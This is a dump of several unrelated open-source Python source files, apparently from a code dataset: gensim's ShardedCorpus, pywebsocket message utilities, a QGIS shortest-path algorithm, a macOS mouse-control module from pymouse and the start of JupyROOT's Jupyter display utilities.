for old_shard_n, old_shard_name in enumerate(old_shard_names):
os.remove(old_shard_name)
except Exception as e:
logger.error('Exception occurred during old shard no. {0} '
'removal: {1}.\nAttempting to at least move '
'new shards in.'.format(old_shard_n, str(e)))
finally:
# If something happens with cleaning up - try to at least get the
# new guys in.
try:
for shard_n, new_shard_name in enumerate(new_shard_names):
os.rename(new_shard_name, self._shard_name(shard_n))
# If something happens when we're in this stage, we're screwed.
except Exception as e:
print(e)
raise RuntimeError('Resizing completely failed for some reason.'
' Sorry, dataset is probably ruined...')
finally:
# Sets the new shard stats.
self.n_shards = n_new_shards
self.offsets = new_offsets
self.shardsize = shardsize
self.reset()
def _shard_name(self, n):
"""Generate the name for the n-th shard."""
return self.output_prefix + '.' + str(n)
def _resized_shard_name(self, n):
"""
Generate the name for the n-th new shard temporary file when
resizing dataset. The file will then be re-named to standard shard name.
"""
return self.output_prefix + '.resize-temp.' + str(n)
def _guess_n_features(self, corpus):
"""Attempt to guess number of features in `corpus`."""
n_features = None
if hasattr(corpus, 'dim'):
# print 'Guessing from \'dim\' attribute.'
n_features = corpus.dim
elif hasattr(corpus, 'dictionary'):
# print 'GUessing from dictionary.'
n_features = len(corpus.dictionary)
elif hasattr(corpus, 'n_out'):
# print 'Guessing from \'n_out\' attribute.'
n_features = corpus.n_out
elif hasattr(corpus, 'num_terms'):
# print 'Guessing from \'num_terms\' attribute.'
n_features = corpus.num_terms
elif isinstance(corpus, TransformedCorpus):
# TransformedCorpus: first check if the transformer object
# defines some output dimension; if it doesn't, relegate guessing
# to the corpus that is being transformed. This may easily fail!
try:
return self._guess_n_features(corpus.obj)
except TypeError:
return self._guess_n_features(corpus.corpus)
else:
if not self.dim:
raise TypeError('Couldn\'t find number of features, '
'refusing to guess (dimension set to {0},'
'type of corpus: {1}).'.format(self.dim, type(corpus)))
else:
logger.warn('Couldn\'t find number of features, trusting '
'supplied dimension ({0})'.format(self.dim))
n_features = self.dim
if self.dim and n_features != self.dim:
logger.warn('Discovered inconsistent dataset dim ({0}) and '
'feature count from corpus ({1}). Coercing to dimension'
' given by argument.'.format(self.dim, n_features))
return n_features
def __len__(self):
return self.n_docs
def _ensure_shard(self, offset):
# No shard loaded
if self.current_shard is None:
shard_n = self.shard_by_offset(offset)
self.load_shard(shard_n)
# Find appropriate shard, if necessary
elif not self.in_current(offset):
if self.in_next(offset):
self.load_shard(self.current_shard_n + 1)
else:
shard_n = self.shard_by_offset(offset)
self.load_shard(shard_n)
def get_by_offset(self, offset):
"""As opposed to getitem, this one only accepts ints as offsets."""
self._ensure_shard(offset)
result = self.current_shard[offset - self.current_offset]
return result
def __getitem__(self, offset):
"""
Retrieve the given row of the dataset. Supports slice notation.
"""
if isinstance(offset, list):
# Handle all serialization & retrieval options.
if self.sparse_serialization:
l_result = sparse.vstack([self.get_by_offset(i)
for i in offset])
if self.gensim:
l_result = self._getitem_sparse2gensim(l_result)
elif not self.sparse_retrieval:
l_result = numpy.array(l_result.todense())
else:
l_result = numpy.array([self.get_by_offset(i) for i in offset])
if self.gensim:
l_result = self._getitem_dense2gensim(l_result)
elif self.sparse_retrieval:
l_result = sparse.csr_matrix(l_result)
return l_result
elif isinstance(offset, slice):
start = offset.start
stop = offset.stop
if stop > self.n_docs:
raise IndexError('Requested slice offset {0} out of range'
' ({1} docs)'.format(stop, self.n_docs))
# - get range of shards over which to iterate
first_shard = self.shard_by_offset(start)
last_shard = self.n_shards - 1
if not stop == self.n_docs:
last_shard = self.shard_by_offset(stop)
# This fails on one-past
# slice indexing; that's why there's a code branch here.
#logger.debug('ShardedCorpus: Retrieving slice {0}: '
# 'shard {1}'.format((offset.start, offset.stop),
# (first_shard, last_shard)))
self.load_shard(first_shard)
# The easy case: both in one shard.
if first_shard == last_shard:
s_result = self.current_shard[start - self.current_offset:
stop - self.current_offset]
# Handle different sparsity settings:
s_result = self._getitem_format(s_result)
return s_result
# The hard case: the slice is distributed across multiple shards
# - initialize numpy.zeros()
s_result = numpy.zeros((stop - start, self.dim),
dtype=self.current_shard.dtype)
if self.sparse_serialization:
s_result = sparse.csr_matrix((0, self.dim),
dtype=self.current_shard.dtype)
# - gradually build it up. We will be using three set of start:stop
# indexes:
# - into the dataset (these are the indexes the caller works with)
# - into the current shard
# - into the result
# Indexes into current result rows. These are always smaller than
# the dataset indexes by `start` (as we move over the shards,
# we're moving by the same number of rows through the result).
result_start = 0
result_stop = self.offsets[self.current_shard_n + 1] - start
# Indexes into current shard. These are trickiest:
# - if in starting shard, these are from (start - current_offset)
# to self.shardsize
# - if in intermediate shard, these are from 0 to self.shardsize
# - if in ending shard, these are from 0
# to (stop - current_offset)
shard_start = start - self.current_offset
shard_stop = self.offsets[self.current_shard_n + 1] - \
self.current_offset
#s_result[result_start:result_stop] = self.current_shard[
# shard_start:shard_stop]
s_result = self.__add_to_slice(s_result, result_start, result_stop,
shard_start, shard_stop)
# First and last get special treatment, these are in between
for shard_n in xrange(first_shard+1, last_shard):
self.load_shard(shard_n)
result_start = result_stop
result_stop += self.shardsize
shard_start = 0
shard_stop = self.shardsize
s_result = self.__add_to_slice(s_result, result_start,
result_stop, shard_start,
shard_stop)
# Last shard
self.load_shard(last_shard)
result_start = result_stop
result_stop += stop - self.current_offset
shard_start = 0
shard_stop = stop - self.current_offset
s_result = self.__add_to_slice(s_result, result_start, result_stop,
shard_start, shard_stop)
s_result = self._getitem_format(s_result)
return s_result
else:
s_result = self.get_by_offset(offset)
s_result = self._getitem_format(s_result)
return s_result
def __add_to_slice(self, s_result, result_start, result_stop, start, stop):
"""
Add the rows of the current shard from `start` to `stop`
into rows `result_start` to `result_stop` of `s_result`.
Operation is based on the self.sparse_serialize setting. If the shard
contents are dense, then s_result is assumed to be an ndarray that
already supports row indices `result_start:result_stop`. If the shard
contents are sparse, assumes that s_result has `result_start` rows
and we should add them up to `result_stop`.
Returns the resulting s_result.
"""
if (result_stop - result_start) != (stop - start):
raise ValueError('Result start/stop range different than stop/start'
'range (%d - %d vs. %d - %d)'.format(result_start,
result_stop,
start, stop))
# Dense data: just copy using numpy's slice notation
if not self.sparse_serialization:
s_result[result_start:result_stop] = self.current_shard[start:stop]
return s_result
# A bit more difficult, we're using a different structure to build the
# result.
else:
if s_result.shape != (result_start, self.dim):
raise ValueError('Assuption about sparse s_result shape '
'invalid: {0} expected rows, {1} real '
'rows.'.format(result_start,
s_result.shape[0]))
tmp_matrix = self.current_shard[start:stop]
s_result = sparse.vstack([s_result, tmp_matrix])
return s_result
def _getitem_format(self, s_result):
if self.sparse_serialization:
if self.gensim:
s_result = self._getitem_sparse2gensim(s_result)
elif not self.sparse_retrieval:
s_result = numpy.array(s_result.todense())
else:
if self.gensim:
s_result = self._getitem_dense2gensim(s_result)
elif self.sparse_retrieval:
s_result = sparse.csr_matrix(s_result)
return s_result
def _getitem_sparse2gensim(self, result):
"""
Change given sparse result matrix to gensim sparse vectors.
Uses the internals of the sparse matrix to make this fast.
"""
def row_sparse2gensim(row_idx, csr_matrix):
indices = csr_matrix.indices[csr_matrix.indptr[row_idx]:csr_matrix.indptr[row_idx+1]]
g_row = [(col_idx, csr_matrix[row_idx, col_idx]) for col_idx in indices]
return g_row
output = (row_sparse2gensim(i, result) for i in xrange(result.shape[0]))
return output
def _getitem_dense2gensim(self, result):
"""Change given dense result matrix to gensim sparse vectors."""
if len(result.shape) == 1:
output = gensim.matutils.full2sparse(result)
else:
output = (gensim.matutils.full2sparse(result[i])
for i in xrange(result.shape[0]))
return output
# Overriding the IndexedCorpus and other corpus superclass methods
def __iter__(self):
"""
Yield dataset items one by one (generator).
"""
for i in xrange(len(self)):
yield self[i]
def save(self, *args, **kwargs):
"""
Save itself (the wrapper) in clean state (after calling `reset()`)
to the output_prefix file. If you wish to save to a different file,
use the `fname` argument as the first positional arg.
"""
# Can we save to a different file than output_prefix? Well, why not?
if len(args) == 0:
args = tuple([self.output_prefix])
attrs_to_ignore = ['current_shard',
'current_shard_n',
'current_offset']
if 'ignore' not in kwargs:
kwargs['ignore'] = frozenset(attrs_to_ignore)
else:
kwargs['ignore'] = frozenset([v for v in kwargs['ignore']]
+ attrs_to_ignore)
super(ShardedCorpus, self).save(*args, **kwargs)
#
# self.reset()
# with smart_open(self.output_prefix, 'wb') as pickle_handle:
# cPickle.dump(self, pickle_handle)
@classmethod
def load(cls, fname, mmap=None):
"""
Load itself in clean state. `mmap` has no effect here.
"""
return super(ShardedCorpus, cls).load(fname, mmap)
@staticmethod
def save_corpus(fname, corpus, id2word=None, progress_cnt=1000,
metadata=False, **kwargs):
"""
Implement a serialization interface. Do not call directly;
use the `serialize` method instead.
Note that you might need some ShardedCorpus init parameters, most
likely the dimension (`dim`). Again, pass these as `kwargs` to the
`serialize` method.
All this thing does is initialize a ShardedCorpus from a corpus
with the `output_prefix` argument set to the `fname` parameter
of this method. The initialization of a ShardedCorpus takes care of
serializing the data (in dense form) to shards.
Ignore the parameters id2word, progress_cnt and metadata. They
currently do nothing and are here only to provide a compatible
method signature with superclass.
"""
ShardedCorpus(fname, corpus, **kwargs)
@classmethod
def serialize(serializer, fname, corpus, id2word=None,
index_fname=None, progress_cnt=None, labels=None,
metadata=False, **kwargs):
"""
Iterate through the document stream `corpus`, saving the documents
as a ShardedCorpus to `fname`.
Use this method instead of calling `save_corpus` directly.
You may need to supply some kwargs that are used upon dataset creation
(namely: `dim`, unless the dataset can infer the dimension from the
given corpus).
Ignore the parameters id2word, index_fname, progress_cnt, labels
and metadata. They currently do nothing and are here only to
provide a compatible method signature with superclass."""
serializer.save_corpus(fname, corpus, id2word=id2word,
progress_cnt=progress_cnt, metadata=metadata,
**kwargs)
| gpl-3.0 | 306,182,225,580,232,000 | 40.387972 | 100 | 0.588455 | false |
zmike/servo | tests/wpt/css-tests/tools/pywebsocket/src/mod_pywebsocket/msgutil.py | 658 | 7598 | # Copyright 2011, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Message related utilities.
Note: request.connection.write/read are used in this module, even though
mod_python document says that they should be used only in connection
handlers. Unfortunately, we have no other options. For example,
request.write/read are not suitable because they don't allow direct raw
bytes writing/reading.
"""
import Queue
import threading
# Export Exception symbols from msgutil for backward compatibility
from mod_pywebsocket._stream_base import ConnectionTerminatedException
from mod_pywebsocket._stream_base import InvalidFrameException
from mod_pywebsocket._stream_base import BadOperationException
from mod_pywebsocket._stream_base import UnsupportedFrameException
# An API for handler to send/receive WebSocket messages.
def close_connection(request):
"""Close connection.
Args:
request: mod_python request.
"""
request.ws_stream.close_connection()
def send_message(request, payload_data, end=True, binary=False):
"""Send a message (or part of a message).
Args:
request: mod_python request.
payload_data: unicode text or str binary to send.
end: True to terminate a message.
False to send payload_data as part of a message that is to be
terminated by next or later send_message call with end=True.
binary: send payload_data as binary frame(s).
Raises:
BadOperationException: when server already terminated.
"""
request.ws_stream.send_message(payload_data, end, binary)
def receive_message(request):
"""Receive a WebSocket frame and return its payload as a text in
unicode or a binary in str.
Args:
request: mod_python request.
Raises:
InvalidFrameException: when client send invalid frame.
UnsupportedFrameException: when client send unsupported frame e.g. some
of reserved bit is set but no extension can
recognize it.
InvalidUTF8Exception: when client send a text frame containing any
invalid UTF-8 string.
ConnectionTerminatedException: when the connection is closed
unexpectedly.
BadOperationException: when client already terminated.
"""
return request.ws_stream.receive_message()
def send_ping(request, body=''):
request.ws_stream.send_ping(body)
class MessageReceiver(threading.Thread):
"""This class receives messages from the client.
This class provides three ways to receive messages: blocking,
non-blocking, and via callback. Callback has the highest precedence.
Note: This class should not be used with the standalone server for wss
because pyOpenSSL used by the server raises a fatal error if the socket
is accessed from multiple threads.
"""
def __init__(self, request, onmessage=None):
"""Construct an instance.
Args:
request: mod_python request.
onmessage: a function to be called when a message is received.
May be None. If not None, the function is called on
another thread. In that case, MessageReceiver.receive
and MessageReceiver.receive_nowait are useless
because they will never return any messages.
"""
threading.Thread.__init__(self)
self._request = request
self._queue = Queue.Queue()
self._onmessage = onmessage
self._stop_requested = False
self.setDaemon(True)
self.start()
def run(self):
try:
while not self._stop_requested:
message = receive_message(self._request)
if self._onmessage:
self._onmessage(message)
else:
self._queue.put(message)
finally:
close_connection(self._request)
def receive(self):
""" Receive a message from the channel, blocking.
Returns:
message as a unicode string.
"""
return self._queue.get()
def receive_nowait(self):
""" Receive a message from the channel, non-blocking.
Returns:
message as a unicode string if available. None otherwise.
"""
try:
message = self._queue.get_nowait()
except Queue.Empty:
message = None
return message
def stop(self):
"""Request to stop this instance.
The instance will be stopped after receiving the next message.
This method may not be very useful, but there is no clean way
in Python to forcefully stop a running thread.
"""
self._stop_requested = True
class MessageSender(threading.Thread):
"""This class sends messages to the client.
This class provides both synchronous and asynchronous ways to send
messages.
Note: This class should not be used with the standalone server for wss
because pyOpenSSL used by the server raises a fatal error if the socket
is accessed from multiple threads.
"""
def __init__(self, request):
"""Construct an instance.
Args:
request: mod_python request.
"""
threading.Thread.__init__(self)
self._request = request
self._queue = Queue.Queue()
self.setDaemon(True)
self.start()
def run(self):
while True:
message, condition = self._queue.get()
condition.acquire()
send_message(self._request, message)
condition.notify()
condition.release()
def send(self, message):
"""Send a message, blocking."""
condition = threading.Condition()
condition.acquire()
self._queue.put((message, condition))
condition.wait()
def send_nowait(self, message):
"""Send a message, non-blocking."""
self._queue.put((message, threading.Condition()))
# vi:sts=4 sw=4 et
| mpl-2.0 | -1,855,365,556,284,930,600 | 33.694064 | 79 | 0.661227 | false |
gioman/QGIS | python/plugins/processing/algs/qgis/ShortestPathPointToLayer.py | 1 | 11506 | # -*- coding: utf-8 -*-
"""
***************************************************************************
ShortestPathPointToLayer.py
---------------------
Date : December 2016
Copyright : (C) 2016 by Alexander Bruy
Email : alexander dot bruy at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Alexander Bruy'
__date__ = 'December 2016'
__copyright__ = '(C) 2016, Alexander Bruy'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
from collections import OrderedDict
from qgis.PyQt.QtCore import QVariant
from qgis.PyQt.QtGui import QIcon
from qgis.core import (QgsWkbTypes, QgsUnitTypes, QgsFeature, QgsGeometry, QgsPoint, QgsFields, QgsField, QgsFeatureRequest,
QgsMessageLog,
QgsProcessingUtils)
from qgis.analysis import (QgsVectorLayerDirector,
QgsNetworkDistanceStrategy,
QgsNetworkSpeedStrategy,
QgsGraphBuilder,
QgsGraphAnalyzer
)
from qgis.utils import iface
from processing.core.GeoAlgorithm import GeoAlgorithm
from processing.core.parameters import (ParameterVector,
ParameterPoint,
ParameterNumber,
ParameterString,
ParameterTableField,
ParameterSelection
)
from processing.core.outputs import OutputVector
from processing.tools import dataobjects
pluginPath = os.path.split(os.path.split(os.path.dirname(__file__))[0])[0]
class ShortestPathPointToLayer(GeoAlgorithm):
INPUT_VECTOR = 'INPUT_VECTOR'
START_POINT = 'START_POINT'
END_POINTS = 'END_POINTS'
STRATEGY = 'STRATEGY'
DIRECTION_FIELD = 'DIRECTION_FIELD'
VALUE_FORWARD = 'VALUE_FORWARD'
VALUE_BACKWARD = 'VALUE_BACKWARD'
VALUE_BOTH = 'VALUE_BOTH'
DEFAULT_DIRECTION = 'DEFAULT_DIRECTION'
SPEED_FIELD = 'SPEED_FIELD'
DEFAULT_SPEED = 'DEFAULT_SPEED'
TOLERANCE = 'TOLERANCE'
OUTPUT_LAYER = 'OUTPUT_LAYER'
def icon(self):
return QIcon(os.path.join(pluginPath, 'images', 'networkanalysis.svg'))
def group(self):
return self.tr('Network analysis')
def name(self):
return 'shortestpathpointtolayer'
def displayName(self):
return self.tr('Shortest path (point to layer)')
def defineCharacteristics(self):
self.DIRECTIONS = OrderedDict([
(self.tr('Forward direction'), QgsVectorLayerDirector.DirectionForward),
(self.tr('Backward direction'), QgsVectorLayerDirector.DirectionForward),
(self.tr('Both directions'), QgsVectorLayerDirector.DirectionForward)])
self.STRATEGIES = [self.tr('Shortest'),
self.tr('Fastest')
]
self.addParameter(ParameterVector(self.INPUT_VECTOR,
self.tr('Vector layer representing network'),
[dataobjects.TYPE_VECTOR_LINE]))
self.addParameter(ParameterPoint(self.START_POINT,
self.tr('Start point')))
self.addParameter(ParameterVector(self.END_POINTS,
self.tr('Vector layer with end points'),
[dataobjects.TYPE_VECTOR_POINT]))
self.addParameter(ParameterSelection(self.STRATEGY,
self.tr('Path type to calculate'),
self.STRATEGIES,
default=0))
params = []
params.append(ParameterTableField(self.DIRECTION_FIELD,
self.tr('Direction field'),
self.INPUT_VECTOR,
optional=True))
params.append(ParameterString(self.VALUE_FORWARD,
self.tr('Value for forward direction'),
'',
optional=True))
params.append(ParameterString(self.VALUE_BACKWARD,
self.tr('Value for backward direction'),
'',
optional=True))
params.append(ParameterString(self.VALUE_BOTH,
self.tr('Value for both directions'),
'',
optional=True))
params.append(ParameterSelection(self.DEFAULT_DIRECTION,
self.tr('Default direction'),
list(self.DIRECTIONS.keys()),
default=2))
params.append(ParameterTableField(self.SPEED_FIELD,
self.tr('Speed field'),
self.INPUT_VECTOR,
optional=True))
params.append(ParameterNumber(self.DEFAULT_SPEED,
self.tr('Default speed (km/h)'),
0.0, 99999999.999999, 5.0))
params.append(ParameterNumber(self.TOLERANCE,
self.tr('Topology tolerance'),
0.0, 99999999.999999, 0.0))
for p in params:
p.isAdvanced = True
self.addParameter(p)
self.addOutput(OutputVector(self.OUTPUT_LAYER,
self.tr('Shortest path'),
datatype=[dataobjects.TYPE_VECTOR_LINE]))
def processAlgorithm(self, context, feedback):
layer = QgsProcessingUtils.mapLayerFromString(self.getParameterValue(self.INPUT_VECTOR), context)
startPoint = self.getParameterValue(self.START_POINT)
endPoints = QgsProcessingUtils.mapLayerFromString(self.getParameterValue(self.END_POINTS), context)
strategy = self.getParameterValue(self.STRATEGY)
directionFieldName = self.getParameterValue(self.DIRECTION_FIELD)
forwardValue = self.getParameterValue(self.VALUE_FORWARD)
backwardValue = self.getParameterValue(self.VALUE_BACKWARD)
bothValue = self.getParameterValue(self.VALUE_BOTH)
defaultDirection = self.getParameterValue(self.DEFAULT_DIRECTION)
bothValue = self.getParameterValue(self.VALUE_BOTH)
defaultDirection = self.getParameterValue(self.DEFAULT_DIRECTION)
speedFieldName = self.getParameterValue(self.SPEED_FIELD)
defaultSpeed = self.getParameterValue(self.DEFAULT_SPEED)
tolerance = self.getParameterValue(self.TOLERANCE)
fields = QgsFields()
fields.append(QgsField('start', QVariant.String, '', 254, 0))
fields.append(QgsField('end', QVariant.String, '', 254, 0))
fields.append(QgsField('cost', QVariant.Double, '', 20, 7))
feat = QgsFeature()
feat.setFields(fields)
writer = self.getOutputFromName(
self.OUTPUT_LAYER).getVectorWriter(fields, QgsWkbTypes.LineString, layer.crs(), context)
tmp = startPoint.split(',')
startPoint = QgsPoint(float(tmp[0]), float(tmp[1]))
directionField = -1
if directionFieldName is not None:
directionField = layer.fields().lookupField(directionFieldName)
speedField = -1
if speedFieldName is not None:
speedField = layer.fields().lookupField(speedFieldName)
director = QgsVectorLayerDirector(layer,
directionField,
forwardValue,
backwardValue,
bothValue,
defaultDirection)
distUnit = iface.mapCanvas().mapSettings().destinationCrs().mapUnits()
multiplier = QgsUnitTypes.fromUnitToUnitFactor(distUnit, QgsUnitTypes.DistanceMeters)
if strategy == 0:
strategy = QgsNetworkDistanceStrategy()
else:
strategy = QgsNetworkSpeedStrategy(speedField,
defaultSpeed,
multiplier * 1000.0 / 3600.0)
multiplier = 3600
director.addStrategy(strategy)
builder = QgsGraphBuilder(iface.mapCanvas().mapSettings().destinationCrs(),
True,
tolerance)
feedback.pushInfo(self.tr('Loading end points...'))
request = QgsFeatureRequest()
request.setFlags(request.flags() ^ QgsFeatureRequest.SubsetOfAttributes)
features = QgsProcessingUtils.getFeatures(endPoints, context, request)
count = QgsProcessingUtils.featureCount(endPoints, context)
points = [startPoint]
for f in features:
points.append(f.geometry().asPoint())
feedback.pushInfo(self.tr('Building graph...'))
snappedPoints = director.makeGraph(builder, points)
feedback.pushInfo(self.tr('Calculating shortest paths...'))
graph = builder.graph()
idxStart = graph.findVertex(snappedPoints[0])
tree, cost = QgsGraphAnalyzer.dijkstra(graph, idxStart, 0)
route = []
total = 100.0 / count
for i in range(1, count + 1):
idxEnd = graph.findVertex(snappedPoints[i])
if tree[idxEnd] == -1:
msg = self.tr('There is no route from start point ({}) to end point ({}).'.format(startPoint.toString(), points[i].toString()))
feedback.setProgressText(msg)
QgsMessageLog.logMessage(msg, self.tr('Processing'), QgsMessageLog.WARNING)
continue
cost = 0.0
current = idxEnd
while current != idxStart:
cost += graph.edge(tree[current]).cost(0)
route.append(graph.vertex(graph.edge(tree[current]).inVertex()).point())
current = graph.edge(tree[current]).outVertex()
route.append(snappedPoints[0])
route.reverse()
geom = QgsGeometry.fromPolyline(route)
feat.setGeometry(geom)
feat['start'] = startPoint.toString()
feat['end'] = points[i].toString()
feat['cost'] = cost / multiplier
writer.addFeature(feat)
route[:] = []
feedback.setProgress(int(i * total))
del writer
| gpl-2.0 | -3,578,964,556,221,195,300 | 43.084291 | 143 | 0.526595 | false |
CamelBackNotation/hackdfw | Dependencies/build/lib.linux-x86_64-2.7/pymouse/mac.py | 10 | 5547 | #Copyright 2013 Paul Barton
#
#This program is free software: you can redistribute it and/or modify
#it under the terms of the GNU General Public License as published by
#the Free Software Foundation, either version 3 of the License, or
#(at your option) any later version.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with this program. If not, see <http://www.gnu.org/licenses/>.
import Quartz
from AppKit import NSEvent, NSScreen
from .base import PyMouseMeta, PyMouseEventMeta
pressID = [None, Quartz.kCGEventLeftMouseDown,
Quartz.kCGEventRightMouseDown, Quartz.kCGEventOtherMouseDown]
releaseID = [None, Quartz.kCGEventLeftMouseUp,
Quartz.kCGEventRightMouseUp, Quartz.kCGEventOtherMouseUp]
class PyMouse(PyMouseMeta):
def press(self, x, y, button=1):
event = Quartz.CGEventCreateMouseEvent(None,
pressID[button],
(x, y),
button - 1)
Quartz.CGEventPost(Quartz.kCGHIDEventTap, event)
def release(self, x, y, button=1):
event = Quartz.CGEventCreateMouseEvent(None,
releaseID[button],
(x, y),
button - 1)
Quartz.CGEventPost(Quartz.kCGHIDEventTap, event)
def move(self, x, y):
move = Quartz.CGEventCreateMouseEvent(None, Quartz.kCGEventMouseMoved, (x, y), 0)
Quartz.CGEventPost(Quartz.kCGHIDEventTap, move)
def drag(self, x, y):
drag = Quartz.CGEventCreateMouseEvent(None, Quartz.kCGEventLeftMouseDragged, (x, y), 0)
Quartz.CGEventPost(Quartz.kCGHIDEventTap, drag)
def position(self):
loc = NSEvent.mouseLocation()
return loc.x, Quartz.CGDisplayPixelsHigh(0) - loc.y
def screen_size(self):
return NSScreen.mainScreen().frame().size.width, NSScreen.mainScreen().frame().size.height
def scroll(self, vertical=None, horizontal=None, depth=None):
#Local submethod for generating Mac scroll events in one axis at a time
def scroll_event(y_move=0, x_move=0, z_move=0, n=1):
for _ in range(abs(n)):
scrollWheelEvent = Quartz.CGEventCreateScrollWheelEvent(
None, # No source
Quartz.kCGScrollEventUnitLine, # Unit of measurement is lines
3, # Number of wheels(dimensions)
y_move,
x_move,
z_move)
Quartz.CGEventPost(Quartz.kCGHIDEventTap, scrollWheelEvent)
#Execute vertical then horizontal then depth scrolling events
if vertical is not None:
vertical = int(vertical)
if vertical == 0: # Do nothing with 0 distance
pass
elif vertical > 0: # Scroll up if positive
scroll_event(y_move=1, n=vertical)
else: # Scroll down if negative
scroll_event(y_move=-1, n=abs(vertical))
if horizontal is not None:
horizontal = int(horizontal)
if horizontal == 0: # Do nothing with 0 distance
pass
elif horizontal > 0: # Scroll right if positive
scroll_event(x_move=1, n=horizontal)
else: # Scroll left if negative
scroll_event(x_move=-1, n=abs(horizontal))
if depth is not None:
depth = int(depth)
if depth == 0: # Do nothing with 0 distance
pass
elif vertical > 0: # Scroll "out" if positive
scroll_event(z_move=1, n=depth)
else: # Scroll "in" if negative
scroll_event(z_move=-1, n=abs(depth))
class PyMouseEvent(PyMouseEventMeta):
def run(self):
tap = Quartz.CGEventTapCreate(
Quartz.kCGSessionEventTap,
Quartz.kCGHeadInsertEventTap,
Quartz.kCGEventTapOptionDefault,
Quartz.CGEventMaskBit(Quartz.kCGEventMouseMoved) |
Quartz.CGEventMaskBit(Quartz.kCGEventLeftMouseDown) |
Quartz.CGEventMaskBit(Quartz.kCGEventLeftMouseUp) |
Quartz.CGEventMaskBit(Quartz.kCGEventRightMouseDown) |
Quartz.CGEventMaskBit(Quartz.kCGEventRightMouseUp) |
Quartz.CGEventMaskBit(Quartz.kCGEventOtherMouseDown) |
Quartz.CGEventMaskBit(Quartz.kCGEventOtherMouseUp),
self.handler,
None)
loopsource = Quartz.CFMachPortCreateRunLoopSource(None, tap, 0)
loop = Quartz.CFRunLoopGetCurrent()
Quartz.CFRunLoopAddSource(loop, loopsource, Quartz.kCFRunLoopDefaultMode)
Quartz.CGEventTapEnable(tap, True)
while self.state:
Quartz.CFRunLoopRunInMode(Quartz.kCFRunLoopDefaultMode, 5, False)
def handler(self, proxy, type, event, refcon):
(x, y) = Quartz.CGEventGetLocation(event)
if type in pressID:
self.click(x, y, pressID.index(type), True)
elif type in releaseID:
self.click(x, y, releaseID.index(type), False)
else:
self.move(x, y)
if self.capture:
Quartz.CGEventSetType(event, Quartz.kCGEventNull)
return event
| mit | -1,704,382,213,220,390,000 | 40.706767 | 98 | 0.614026 | false |
BerserkerTroll/root | bindings/pyroot/JupyROOT/utils.py | 6 | 14510 | # -*- coding:utf-8 -*-
#-----------------------------------------------------------------------------
# Author: Danilo Piparo <[email protected]> CERN
#-----------------------------------------------------------------------------
from __future__ import print_function
import os
import sys
import select
import tempfile
import pty
import itertools
import re
import fnmatch
import time
from hashlib import sha1
from contextlib import contextmanager
from subprocess import check_output
from IPython import get_ipython
from IPython.display import HTML
from IPython.core.extensions import ExtensionManager
import IPython.display
import ROOT
from JupyROOT import handlers
# We want iPython to take over the graphics
ROOT.gROOT.SetBatch()
cppMIME = 'text/x-c++src'
_jsMagicHighlight = """
Jupyter.CodeCell.options_default.highlight_modes['magic_{cppMIME}'] = {{'reg':[/^%%cpp/]}};
console.log("JupyROOT - %%cpp magic configured");
"""
_jsNotDrawableClassesPatterns = ["TGraph[23]D","TH3*","TGraphPolar","TProf*","TEve*","TF[23]","TGeo*","TPolyLine3D", "TH2Poly"]
_jsROOTSourceDir = "https://root.cern.ch/js/notebook/"
_jsCanvasWidth = 800
_jsCanvasHeight = 600
_jsCode = """
<div id="{jsDivId}"
style="width: {jsCanvasWidth}px; height: {jsCanvasHeight}px">
</div>
<script>
requirejs.config({{
paths: {{
'JSRootCore' : '{jsROOTSourceDir}/scripts/JSRootCore',
}}
}});
require(['JSRootCore'],
function(Core) {{
var obj = Core.JSONR_unref({jsonContent});
Core.draw("{jsDivId}", obj, "{jsDrawOptions}");
}}
);
</script>
"""
TBufferJSONErrorMessage="The TBufferJSON class is necessary for JS visualisation to work and cannot be found. Did you enable the http module (-D http=ON for CMake)?"
def TBufferJSONAvailable():
if hasattr(ROOT,"TBufferJSON"):
return True
print(TBufferJSONErrorMessage, file=sys.stderr)
return False
_enableJSVis = False
_enableJSVisDebug = False
def enableJSVis():
if not TBufferJSONAvailable():
return
global _enableJSVis
_enableJSVis = True
def disableJSVis():
global _enableJSVis
_enableJSVis = False
def enableJSVisDebug():
if not TBufferJSONAvailable():
return
global _enableJSVis
global _enableJSVisDebug
_enableJSVis = True
_enableJSVisDebug = True
def disableJSVisDebug():
global _enableJSVis
global _enableJSVisDebug
_enableJSVis = False
_enableJSVisDebug = False
def _getPlatform():
return sys.platform
def _getLibExtension(thePlatform):
'''Return appropriate file extension for a shared library
>>> _getLibExtension('darwin')
'.dylib'
>>> _getLibExtension('win32')
'.dll'
>>> _getLibExtension('OddPlatform')
'.so'
'''
pExtMap = {
'darwin' : '.dylib',
'win32' : '.dll'
